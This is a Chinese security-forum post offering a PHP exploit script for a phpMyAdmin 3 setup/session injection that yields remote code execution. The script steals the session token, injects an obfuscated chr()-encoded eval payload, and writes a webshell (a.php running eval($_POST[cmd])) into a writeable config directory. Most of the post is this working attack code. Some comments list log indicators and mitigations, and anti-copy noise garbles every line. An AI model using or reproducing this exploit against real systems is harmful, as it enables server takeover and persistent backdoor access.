phpadmin3 remote code execute php版本exploit

发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。

昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp,由于我搞得晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

于是写了这个php版本的exp,代码如下:
3 z$ y4 ]6 f9 Q! N  V4 r' h' f#!/usr/bin/php
  w1 n3 L' U! J) R& K<?php
/**
 * PoC for the phpMyAdmin 3 setup/session issue named in the banner below.
 * The CVE id as pasted is mangled by the forum's anti-copy noise, which is
 * also sprinkled through every line of this listing; read the code as a
 * reference, not as a runnable file.
 *
 * Precondition, as the author's own note and the final check state: a
 * web-served, writeable config/ directory under the pma3 path.  That is the
 * directory phpMyAdmin's setup instructions tell you to remove after
 * installation, which is the simplest mitigation; upgrading to a release that
 * addresses the listed CVE closes the session injection itself.
 *
 * Indicators an operator can look for in web logs (all visible in the
 * requests this script sends): a GET of <path>config/, a db_create.php
 * request whose query string contains session_to_unset= and
 * _SESSION[ConfigFile], a POST to setup/config.php carrying submit_save=Save,
 * a GET of config/config.inc.php, and the fixed MSIE 6 User-Agent string set
 * in php_request().  A new config/a.php is the on-disk artefact.
 */
: w: c  R. _4 R3 Oprint_r('
8 u9 j0 H9 ~* S* O% T0 y- R% S) {  A+---------------------------------------------------------------------------+
  c1 }1 K( P3 J# O0 n. Wpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
) T0 q# s, r& P; P) z% Kby oldjun(www.oldjun.com)$ C) l8 E$ B# I
welcome to www.t00ls.net
6 K4 r, p* `( N+ r% l) hmail: oldjun@gmail.com! V, z# L; I6 V7 y
Assigned CVE id: CVE-2011-25056 \- v2 L! e; y9 v
+---------------------------------------------------------------------------+
7 p4 `) z1 p2 B7 }  V7 d+ K5 n# e');
: j" Q: q8 t) w: F' c( B
' J7 a: V, M/ E5 X/**$ G9 W% f, R! W- x% I0 n4 @$ q
* working when the directory:"config" exists and is writeable.
- _: R" n! j4 [**/6 C; u6 N: F/ x/ F- J# L! S3 C4 Q

// Two positional arguments: the target host (resolved to an IP inside
// php_request()) and the URL path of the pma3 install, e.g. /pma/.
5 C* f" ?% X2 b3 Qif ($argc < 3) {
+ ~3 J* ^" M! X' \; r    print_r('
$ y% z6 O. f; f: K  K; Y+---------------------------------------------------------------------------+
, `4 T$ G8 d. c7 K1 }Usage: php '.$argv[0].' host path5 T6 |# H" h% _: G# {) [9 C
host:      target server (ip/hostname); {* q5 v; c7 i, N* g/ f) ?
path:      path to pma3& ?$ S/ u( j* Z# P, _! e3 D
Example:
8 W$ z# v1 L* C9 a* t( u, d4 H- }php '.$argv[0].' localhost /pma// y1 E$ l6 ]/ j' G
+---------------------------------------------------------------------------+7 C9 O' {: Z' U' R; C5 I. w' i! U% \( R
');
5 P9 s- u+ R  _  A2 U    exit;
9 H; s1 y8 }$ @$ ]* o4 b}6 W+ K* ^6 }' [: c8 x4 w) }
  E( W: e' u. O+ M9 ?) j4 n# P: P
// Both are read as globals by php_request(); $path is prepended verbatim to
// every request URL (no separator is added), so it has to end with '/'.
$host = $argv[1];7 ]( }* R, X; ^$ W$ t/ T4 y2 l; J( ~
$path = $argv[2];
, E% [1 M; `3 h8 \
6 T2 [& b1 k6 _/ t/**
8 G: k3 }1 f4 b. @" D * Try to determine if the directory:"config" exists8 ]8 ]4 {" I& W, B! o; K9 K2 R) j
**/; G! J- q0 R% _5 c+ e
// Step 1, probe.  php_request() returns the raw response with the status line
// included, so a '404' anywhere in it is taken to mean config/ is not served;
// any other status (a 403 from an access rule, say) passes this check.
echo "[+] Try to determine if the directory:config exists....\n";* ?( d0 u$ R! b$ t7 r
$returnstr=php_request('config/');+ s* H4 `' N+ x* ?3 ~) ?6 Z8 k
if(strpos($returnstr,'404')){' J8 Q; T: t( |- O7 _2 @
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
5 b, h) {9 a9 }  A, ~' H" V) A}
8 c9 ~& |. `. S* F+ ~
& c$ m# u) u+ Z/**9 I6 p+ C( r# _  t; O: R+ N
* Try to get token and sessionid4 K% x2 X* l; E" z6 D! k
**/
// Step 2.  One regex scrapes both values from the index.php response: the
// phpMyAdmin session cookie (32-40 word characters) lands in $resp[1] and the
// 32-character token in $resp[3]; $resp[2] is the text between them and is
// never used.  Either value missing aborts the run.
& j' F$ A* Z. N$ w) w8 {6 Gecho "[+] Try to get token and sessionid....\n";
/ @; Y8 z3 X& H$result=php_request('index.php');' \6 e8 I* t6 \. a7 s; W# ^( ?/ J4 T
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
* i$ m+ p0 G: p$token=$resp[3];* W. E  e: ?7 T% z! S
$sessionid=$resp[1];8 N1 g# m+ \4 F* k
if($token && $sessionid){
+ x3 @- F0 j- V2 x$ Z    echo "[+] tokentoken\n";7 ^8 U- t/ ]2 f! m
    echo "[+] Session IDsessionid\n";
* g7 A" `' S* i* ]4 Z: ?; H/ E' C}else{
* R3 ^+ }3 ^- X9 u5 ^    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
( L( Z4 `  P3 B- R}+ a: R# u8 M3 a8 k. w( T
+ s0 ]+ t1 S# C
/**
3 }- [# I* X% s; w& O% i1 k) q1 t * Try to insert shell into session- p: I, O0 F* D" I3 s
**/
// Step 3.  The payload travels in the *name* of a request parameter,
// _SESSION[ConfigFile][Servers][...][host].  The '*/' and '/*' bracketing the
// eval() are presumably what let it escape the generated config text once the
// setup script writes the session's ConfigFile contents to disk, i.e. the root
// cause is attacker-controlled session keys ending up unescaped in PHP source.
// The chr() chain spells the dropper that the success message below
// advertises (a.php containing eval($_POST[cmd])) and echoes 't00ls' as a
// marker.  session_to_unset=t00ls and the t00ls.net host value are further
// literal strings from this PoC that a WAF or log search can key on.
; R# K  q7 [! b/ W# kecho "[+] Try to insert shell into session....\n";
# j* J: r" U0 o6 s: D9 O* l8 z* h9 B9 Y9 aphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
0 r5 l. J+ m2 K9 h1 e9 S
' M1 H: Q  w5 ?2 H/ h/**
: N4 R+ a  \2 j- A8 n8 n) R * Try to create webshell
) c0 H2 x9 C4 y) o**/* N2 z) p. [  N$ Z# P+ v4 {* c
// Step 4a.  Saving through the setup script is what materialises the poisoned
// session as config/config.inc.php.  A POST to setup/config.php carrying
// submit_save=Save from a client that never walked the setup UI is the event
// worth alerting on; the session cookie is sent both as a form field and as
// the Cookie header.
echo "[+] Try to create webshell....\n";8 N: A2 K8 d/ Z4 M  k/ I  h
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
- H+ Y, l$ B  @2 L6 \* G: X/**! @! k. V4 k2 }2 c) ]9 D+ I' P5 ~
* Try to check if the webshell was created successfully
* r9 o3 Y( @1 u* o* e**/
// Step 4b.  Fetching config/config.inc.php is both the check and, presumably,
// what executes the file just written; success is judged solely by the
// 't00ls' marker appearing in the response, and the failure message lumps
// "no config/ dir" and "not writeable" together.
$ i( \) Z: e. E, K; S7 f* kecho "[+] Try to check if the webshell was created successfully....\n";
7 r# h6 V& {" J: A3 M$content=php_request('config/config.inc.php');7 {: ~& i9 d1 m- m
if(strpos($content,'t00ls')){( b, q& `% Z2 g- C
    echo "[+] Congratulations! Expoilt successfully....\n";( j% V: S" w! Z0 h8 _
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";! g' [, r& k. ]
}else{+ h- ~; c$ U0 W4 v; a" V, E' n9 X
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
) q* [$ {% U/ z) @& \! b- T) ~}- l8 c9 U$ M" N2 d: ^- \

/**
 * Send one hand-built HTTP/1.1 request and return the raw reply.
 *
 * @param string $url     path relative to the global $path; the two are
 *                        concatenated with no separator
 * @param string $data    url-encoded body; non-empty turns the request into a
 *                        POST and adds Content-Type/Content-Length
 * @param string $cookie  raw Cookie header value, sent only when non-empty
 * @return string         everything read from the socket until EOF: status
 *                        line, headers and body, unparsed (callers grep it
 *                        with strpos/preg_match)
 *
 * Reads $host and $path from the global scope.  The connection is plain TCP
 * to port 80 (no TLS, port not configurable) with PHP's default socket
 * timeout; a failed connect prints a message and terminates the script.
 * The User-Agent below is a constant, which makes it a usable fingerprint
 * for this PoC in access logs.
 */
, _+ g5 Y' ?- }; _- b, Cfunction php_request($url,$data='',$cookie=''){
4 h5 N6 B# [; \2 L5 c$ c    global  $host, $path;& a* d& j0 o8 C3 P3 z8 D1 |
    - h5 ~; c& h, Q/ w
    // Method is inferred from the presence of a body (a body of "0" would be
    // treated as absent).
    $method=$data?'POST':'GET';
" B1 T9 u* ~( C1 W    0 z$ i5 d2 P. B! x! Y: P% I
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
! A' I9 ^' F2 a0 ^1 a- P4 I* e& h    $packet .= "Accept: */*\r\n";
, J7 |8 L; K8 \+ z& W; B" ?/ Q* u    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
% p  L; C2 y1 \4 {5 U    $packet .= "Host: $host\r\n";
6 x: |3 K" h* \+ I- g; u+ Z4 ?& Q    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";0 o+ z7 }5 s2 j: w  O. p
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
" t" l7 l* p' i- l# n" q: T$ A    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    // Connection: Close is what lets the read loop below stop at EOF.
, R& {; g. d3 B. R& W1 d& a$ z    $packet .= "Connection: Close\r\n\r\n";
4 h$ X5 v5 _2 P( y, n    $packet .= $data?$data:"";
; o; i, N$ ^% b
    // Host is resolved here; port 80 is hard-coded and no timeout is passed.
" d0 t6 {$ m* g% ^    $fp = fsockopen(gethostbyname($host), 80);/ |8 h* K( i* w9 \' X
    if (!$fp) {
( c8 |2 W; z8 M    echo 'No response from '.$host; die;
" d. `& t$ P7 g3 `, \1 k2 }+ L    }
/ _7 u' K; o4 i( e    fputs($fp, $packet);
5 h3 U6 N6 E7 s. i+ g  K: ]1 p' H( D# m3 Z7 i1 _# }, ]/ q( r5 a
    $resp = '';8 t4 _" A6 T0 U- Z) }9 a. z4 D/ m

    // Drain the socket in 1 KiB chunks; the handle is never fclose()d, the
    // script simply exits soon after.
$ B1 U9 q% g& t3 ^* m  b% O% ?    while ($fp && !feof($fp))
8 q( \1 c4 A% ?! u4 S        $resp .= fread($fp, 1024);
. U! \0 P$ K" D; s# {6 v
6 h& ?, \+ c. f) a. y, r  B    return $resp;4 L+ |2 U' ?1 ^* x! c: R
}
. I, U3 T( e# q7 M: k+ }   
3 s8 r5 n; T3 n- s?> 4 n8 H4 P7 [( w/ t2 g. @/ c
.